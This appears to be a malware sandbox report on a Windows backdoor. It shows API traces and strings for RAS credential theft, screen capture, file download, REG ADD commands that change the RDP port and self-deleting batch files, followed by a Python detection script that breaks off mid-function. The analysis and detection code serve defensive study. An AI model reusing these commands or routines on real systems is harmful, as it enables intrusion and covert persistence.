                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
                        • String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                        • API String ID: 4167786638-3033193607
                        • Opcode ID: 62fdc036efb3f08eb917b7ad97d9db31e77baedd4283ce09ea0ee9c22c8b1d22
                        • Instruction ID: 65fd49af7cc330dfde9ed866b878fdab77b69f329216efd5a696316092efa724
                        • Opcode Fuzzy Hash: 62fdc036efb3f08eb917b7ad97d9db31e77baedd4283ce09ea0ee9c22c8b1d22
                        • Instruction Fuzzy Hash: 14815E71504385ABE724CB14CC84FABB3E9FBC4744F004A1DF68997255DB78AA05CB66
                        APIs
                        • LocalAlloc.KERNEL32 ref: 10012330
                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 10012360
                        • RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 10012386
                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 100124B0
                        • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 100124DF
                        • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 100124FF
                        • strstr.MSVCRT ref: 10012584
                        • strstr.MSVCRT ref: 1001259B
                        • lstrlen.KERNEL32(?), ref: 100125B0
                        • lstrlen.KERNEL32(?), ref: 100125B9
                        • LocalSize.KERNEL32(00000000), ref: 100125C7
                        • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100125D5
                        • lstrlen.KERNEL32(?), ref: 100125E6
                        • lstrlen.KERNEL32(?), ref: 10012604
                        • lstrlen.KERNEL32(?), ref: 10012616
                        • lstrlen.KERNEL32(?), ref: 1001263F
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 100126AF
                        • RegCloseKey.ADVAPI32(00000040), ref: 100126C6
                        • LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 100126D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
                        • String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
                        • API String ID: 2254360075-2665300987
                        • Opcode ID: 2c83e0f3829b57c1637a005e2d03bd4edf689333d9d089b7fdcf0465c8605360
                        • Instruction ID: 9a663e677994bdbda6aa0451083b79a34b57187614e022742c0a7b2eb9cd9f4c
                        • Opcode Fuzzy Hash: 2c83e0f3829b57c1637a005e2d03bd4edf689333d9d089b7fdcf0465c8605360
                        • Instruction Fuzzy Hash: 87B1D6B16043856BD715CF24CC90BABB7DAEFC8350F444A2DFA8997280EA75EE48C751
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CEB5
                        • lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CEC8
                        • lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CEE6
                        • lstrcat.KERNEL32(00000000,@del "), ref: 1000CEF8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 1000CF07
                        • lstrcat.KERNEL32(00000000,"), ref: 1000CF16
                        • lstrcat.KERNEL32(00000000,@del ), ref: 1000CF25
                        • lstrcat.KERNEL32(00000000,?), ref: 1000CF34
                        • lstrcat.KERNEL32(00000000,@exit), ref: 1000CF43
                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CF59
                        • WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CF76
                        • CloseHandle.KERNEL32(00000000), ref: 1000CF7D
                        • WinExec.KERNEL32(?,00000000), ref: 1000CF8A
                        • ExitProcess.KERNEL32 ref: 1000CF92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
                        • String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
                        • API String ID: 433470039-873414491
                        • Opcode ID: d6c722796a129642dce7219ad350ec3b9c467727d6019d44186d2aca1d57c634
                        • Instruction ID: 9189458aa8c4cf93b31bced51721bf63fee7bb030453e1165ca5f5ef6cc5b1c3
                        • Opcode Fuzzy Hash: d6c722796a129642dce7219ad350ec3b9c467727d6019d44186d2aca1d57c634
                        • Instruction Fuzzy Hash: 4D41C072515794ABEB12CB60CC85FC67BA9EF8E710F044C98E6845F044DB74B629CB93
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
                        • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                        • API String ID: 3047203434-1551478559
                        • Opcode ID: a1220443a54d2b53f0f4d7c090762801d30e4d452ea2ed4c57b0f136f52fed29
                        • Instruction ID: 5b22ac7470861d30f40f049b028cb2d5bfa3e7d4fdb3b283d83c52af37cf9561
                        • Opcode Fuzzy Hash: a1220443a54d2b53f0f4d7c090762801d30e4d452ea2ed4c57b0f136f52fed29
                        • Instruction Fuzzy Hash: 8D510B3211026417E714D6B48C44DDF7BD6EFC6260F02861DFA9293190DFBDEA498799
                        APIs
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 10009341
                        • lstrcat.KERNEL32(?,rar.exe), ref: 1000937D
                        • PathIsDirectoryA.SHLWAPI(?), ref: 10009380
                        • lstrcpy.KERNEL32(?,?), ref: 10009399
                        • lstrcat.KERNEL32(?,.rar), ref: 100093A8
                        • lstrcpy.KERNEL32(?,?), ref: 100093B0
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 100093BC
                        • wsprintfA.USER32 ref: 100093D8
                        • lstrcpy.KERNEL32(?,?), ref: 100093FC
                        • PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009407
                        • lstrcat.KERNEL32(?,.rar), ref: 10009417
                        • wsprintfA.USER32 ref: 1000942C
                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009450
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
                        • String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
                        • API String ID: 1594156495-1032977547
                        • Opcode ID: efdd53268cf342ae471ac0c08158dc04c7c086f7e75fb8a4579fe12ad8bd1881
                        • Instruction ID: 3e314928fd486b522302930d6b560aaf31cc8829cd0054620456e89bedff2735
                        • Opcode Fuzzy Hash: efdd53268cf342ae471ac0c08158dc04c7c086f7e75fb8a4579fe12ad8bd1881
                        • Instruction Fuzzy Hash: A84160B2104395AEE720DBA0CC94FEB77ADEBC5304F008D1DF785A7140DA74A609CB66
                        APIs
                        • malloc.MSVCRT ref: 1000B5DD
                        • atoi.MSVCRT(?), ref: 1000B5FC
                        • CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B630
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B6C0
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B6DC
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B700
                        Strings
                        • /f , xrefs: 1000B663, 1000B73A
                        • C:\3389.bat, xrefs: 1000B81A
                        • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B707
                        • del %0, xrefs: 1000B7C0
                        • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B63B
                        • c:\3389.bat, xrefs: 1000B62B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Createatoimalloc
                        • String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
                        • API String ID: 664794413-4273509073
                        • Opcode ID: 4a562beb377eb0d25d3c94206fc7b098a05763544a8525e4422677f9804f71b6
                        • Instruction ID: 2dd11e1bc02b0585d4e01d345c94449c095036edea532750c3430a92ba72a645
                        • Opcode Fuzzy Hash: 4a562beb377eb0d25d3c94206fc7b098a05763544a8525e4422677f9804f71b6
                        • Instruction Fuzzy Hash: AB61B1721147846AE328CB74CC45BFB77E9EBC8310F104A2DF796932D1DEB5AA088B55
                        APIs
                        • LoadLibraryA.KERNEL32(wininet.dll), ref: 10004973
                        • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004991
                        • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 1000499B
                        • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100049A7
                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100049B3
                        • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100049BF
                        • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100049CB
                        • printf.MSVCRT ref: 10004ABB
                        • FreeLibrary.KERNEL32(00000000), ref: 10004AEA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Library$FreeLoadprintf
                        • String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
                        • API String ID: 2425834421-3882969375
                        • Opcode ID: 5604c677c17d616dbd6237320c0c9e17bb52209961f7397e4e27ee8460d61bf8
                        • Instruction ID: c76f49d10d34aaa2aae48d406b6706546d346a6edc979813e33e8e3e0fc9c0ae
                        • Opcode Fuzzy Hash: 5604c677c17d616dbd6237320c0c9e17bb52209961f7397e4e27ee8460d61bf8
                        • Instruction Fuzzy Hash: 8B410571644344ABE220DF658C44F6FBBE8EFC2750F41491DB68567180DFB8ED048BAA
                        APIs
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011407
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011411
                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011419
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011425
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011429
                        • WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009F25,?), ref: 10011434
                        • TerminateThread.KERNEL32(?,00000000,?,?,?,10009F25,?), ref: 10011440
                        • Sleep.KERNEL32(00000001,?,?,?,10009F25,?), ref: 10011444
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011454
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 1001145E
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011468
                        • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009F25,?), ref: 10011472
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001147E
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011484
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001148A
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011490
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 10011496
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 1001149C
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 100114A2
                        • CloseHandle.KERNEL32(?,?,?,?,10009F25,?), ref: 100114A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
                        • String ID:
                        • API String ID: 3528565692-0
                        • Opcode ID: 5207acf1ee83dc58ee6dcb939570a2e4c8c5c7fe19468d28379d1938b680d4f6
                        • Instruction ID: 865924512262c39c9a3102b07c9aebe7ff44f914d59cef4649d6c81058281ce9
                        • Opcode Fuzzy Hash: 5207acf1ee83dc58ee6dcb939570a2e4c8c5c7fe19468d28379d1938b680d4f6
                        • Instruction Fuzzy Hash: 7721DC71600704ABE624EBBACC84F57F3EDAF98B50F114A0DE246D7690CAB4F8419A60
                        APIs
                        • strrchr.MSVCRT ref: 100082C9
                        • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 100082FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Openstrrchr
                        • String ID: "%1$%s\shell\open\command$D
                        • API String ID: 1564636448-1634606264
                        • Opcode ID: d52b26d16d16e37de8f49ba75a6bca74216bbfb679f3325d1faf73aa7bd7866a
                        • Instruction ID: 0c999137368e92a700a38a841f1f30b9781bb876b16acea980fc4db480d06be6
                        • Opcode Fuzzy Hash: d52b26d16d16e37de8f49ba75a6bca74216bbfb679f3325d1faf73aa7bd7866a
                        • Instruction Fuzzy Hash: FE418372504345ABE714CB60DC80FABB7EDFBC4345F004C2DFA9497250EAB5EA498B62
                        APIs
                        • LoadCursorA.USER32(00000000,00000000), ref: 1000FDE3
                          • Part of subcall function 100106B0: ReleaseDC.USER32(?,?), ref: 100106CA
                          • Part of subcall function 100106B0: GetDesktopWindow.USER32 ref: 100106D0
                          • Part of subcall function 100106B0: GetDC.USER32(00000000), ref: 100106DD
                        • GetDesktopWindow.USER32 ref: 1000FE32
                        • GetDC.USER32(00000000), ref: 1000FE3F
                        • GetTickCount.KERNEL32 ref: 1000FE53
                        • GetSystemMetrics.USER32(00000000), ref: 1000FE7D
                        • GetSystemMetrics.USER32(00000001), ref: 1000FE84
                        • CreateCompatibleDC.GDI32(?), ref: 1000FEA2
                        • CreateCompatibleDC.GDI32(?), ref: 1000FEAB
                        • CreateCompatibleDC.GDI32(00000000), ref: 1000FEB4
                        • CreateCompatibleDC.GDI32(00000000), ref: 1000FEBA
                        • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FF19
                        • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FF2A
                        • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FF3E
                        • SelectObject.GDI32(?,?), ref: 1000FF54
                        • SelectObject.GDI32(?,?), ref: 1000FF5E
                        • SelectObject.GDI32(?,?), ref: 1000FF6E
                        • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FF7E
                        • ??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FF8D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
                        • String ID:
                        • API String ID: 339399666-0
                        • Opcode ID: a628a9eefc200cb31a8e85018976252ce4784f425b9ed0d6ffdef3f5299ffd15
                        • Instruction ID: 1c21295455e3ec45158c911841c44fc3419dd068098a4d7aa9d695b155e4a8fd
                        • Opcode Fuzzy Hash: a628a9eefc200cb31a8e85018976252ce4784f425b9ed0d6ffdef3f5299ffd15
                        • Instruction Fuzzy Hash: 4581D4B0504B459FE320DF69C884A2BFBE9FB89704F004A1DE59A87750DBB9F8458F91
                        APIs
                        • sprintf.MSVCRT ref: 10006D1F
                        • sprintf.MSVCRT ref: 10006D67
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006D7F
                        • Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006D86
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006D98
                        • Sleep.KERNEL32(000493E0), ref: 10006DC8
                        • CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006E02
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006E22
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006E29
                        • WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006E36
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006E4F
                          • Part of subcall function 100069C0: GetInputState.USER32 ref: 100069C3
                          • Part of subcall function 100069C0: GetCurrentThreadId.KERNEL32 ref: 100069CF
                          • Part of subcall function 100069C0: PostThreadMessageA.USER32(00000000), ref: 100069D6
                          • Part of subcall function 100069C0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                          • Part of subcall function 100042E0: GetTickCount.KERNEL32 ref: 100042E1
                          • Part of subcall function 100042E0: rand.MSVCRT ref: 100042E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
                        • String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
                        • API String ID: 1802622305-1970547419
                        • Opcode ID: 86b2fbf9e77a3bdbd3f49c7996ce6159376f5595de912d1e34bcd1a945268350
                        • Instruction ID: 8861702fd6604c71056051f16bc259cc30c7169df780bacc6396a16b4c086892
                        • Opcode Fuzzy Hash: 86b2fbf9e77a3bdbd3f49c7996ce6159376f5595de912d1e34bcd1a945268350
                        • Instruction Fuzzy Hash: 1441E7B66443513EF3109764DC42FB737AAEB85784F100424F786AA2C1DAE16946866B
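The function above is the downloader and cleanup routine: it formats a URL with a random cache-busting query (%s?abc=%d%d%d%d, the digits coming from the GetTickCount/rand subcall), fetches it with URLDownloadToFileA into C:\WINDOWS\TEMP\%d%d%d%d.ccc, and later writes C:\Del.bat containing a wildcard delete of that temp directory followed by Del %0 (the batch file removes itself), which it launches hidden via WinExec. The following is an added detection example, not code from the report or from the sample: it runs the three checks a responder would want over constructed Sysmon-style records. The event field names, the dropper image C:\Windows\dropped.exe, the 7-digit temp name and the exact cmd.exe command line are assumptions.

```python
import re
from typing import Dict, Iterable, List, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style records (EventID 11 = FileCreate, 1 = ProcessCreate).
# The dropper path C:\Windows\dropped.exe, the 7-digit temp name and the cmd.exe
# command line are illustrative assumptions, not values from the report.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "11", "Image": r"C:\Windows\dropped.exe",
     "TargetFilename": r"C:\WINDOWS\TEMP\2731145.ccc"},
    {"EventID": "11", "Image": r"C:\Windows\dropped.exe",
     "TargetFilename": r"C:\Del.bat"},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\dropped.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Del.bat" "'},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# C:\Del.bat content as the two strings in the listing imply; the report shows them
# run together, the line break between them is assumed.
SAMPLE_BATCH = "Del c:\\windows\\temp\\**.ccc\r\nDel %0\r\n"

# Download target format C:\WINDOWS\TEMP\%d%d%d%d.ccc: digits only, .ccc extension.
TEMP_CCC = re.compile(r"^[a-z]:\\windows\\temp\\\d+\.ccc$", re.I)
# "del %0" (optionally with switches) is the batch-file self-deletion idiom.
SELF_DELETE = re.compile(r"^\s*del\s+(?:/\S+\s+)*%0\s*$", re.I | re.M)
WILDCARD_TEMP_DEL = re.compile(r"^\s*del\s+.*\\temp\\.*\*", re.I | re.M)


def find_temp_ccc_drops(events: Iterable[Event]) -> List[str]:
    """FileCreate events whose target matches the downloader's naming scheme."""
    return [e["TargetFilename"] for e in events
            if e.get("EventID") == "11" and TEMP_CCC.match(e.get("TargetFilename", ""))]


def find_batch_drop_then_exec(events: Iterable[Event]) -> List[Tuple[str, str]]:
    """(.bat path, dropper image) where a process writes a .bat and a later cmd.exe
    child of that same process carries the .bat on its command line (WinExec of a
    batch file is realised by CreateProcess as a cmd.exe /c child)."""
    events = list(events)
    hits: List[Tuple[str, str]] = []
    for i, e in enumerate(events):
        target = e.get("TargetFilename", "")
        if e.get("EventID") != "11" or not target.lower().endswith(".bat"):
            continue
        dropper = e.get("Image", "")
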